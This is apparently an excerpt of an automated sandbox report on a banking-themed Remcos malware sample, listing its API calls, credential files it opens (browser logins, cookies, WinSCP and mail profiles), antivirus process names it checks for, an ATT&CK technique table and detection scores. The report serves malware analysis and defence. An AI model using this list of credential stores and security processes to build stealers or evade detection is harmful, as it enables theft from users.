                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF706EB6EE4
                      Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,12_2_00007FF627B53800
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02DF5ACC
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02DFA7C4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02DF5BD8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,15_2_02DFA810
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,16_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,17_2_00007FF706EC51EC
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,17_2_00007FF706EC3140
                      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,17_2_00007FF706EB6EE4
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\alg.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC9584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,9_2_00007FF706EC9584
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B370F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,12_2_00007FF627B370F4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB586C GetVersion,9_2_00007FF706EB586C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 7256, type: MEMORYSTR

                      Remote Access Functionality

                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A7E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,12_2_00007FF627A7E568
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A6227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,12_2_00007FF627A6227C
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A85648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,12_2_00007FF627A85648
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A654A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,12_2_00007FF627A654A0
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity InformationAcquire Infrastructure2
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      LSASS Driver
                      1
                      LSASS Driver
                      31
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      12
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      211
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      2
                      Valid Accounts
                      2
                      Valid Accounts
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      System Network Connections Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      21
                      Access Token Manipulation
                      1
                      Install Root Certificate
                      NTDS3
                      File and Directory Discovery
                      Distributed Component Object Model211
                      Input Capture
                      4
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd21
                      Registry Run Keys / Startup Folder
                      311
                      Process Injection
                      11
                      Software Packing
                      LSA Secrets48
                      System Information Discovery
                      SSH1
                      Clipboard Data
                      125
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Scheduled Task/Job
                      1
                      Timestomp
                      Cached Domain Credentials1
                      Query Registry
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      DCSync251
                      Security Software Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job431
                      Masquerading
                      Proc Filesystem1
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                      Valid Accounts
                      /etc/passwd and /etc/shadow151
                      Virtualization/Sandbox Evasion
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                      Virtualization/Sandbox Evasion
                      Network Sniffing1
                      Application Window Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                      Access Token Manipulation
                      Input Capture1
                      System Owner/User Discovery
                      Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                      Process Injection
                      Keylogging1
                      System Network Configuration Discovery
                      Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      [Behavior graph (image not preserved): Behavior Graph ID: 1557469, Sample: Ziraat_Bankasi_Swift_Mesaji..., Startdate: 18/11/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | 13% | ReversingLabs | Script-BAT.Trojan.Remcos
                      Source | Detection | Scanner | Label | Link
                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                      C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML
                      C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
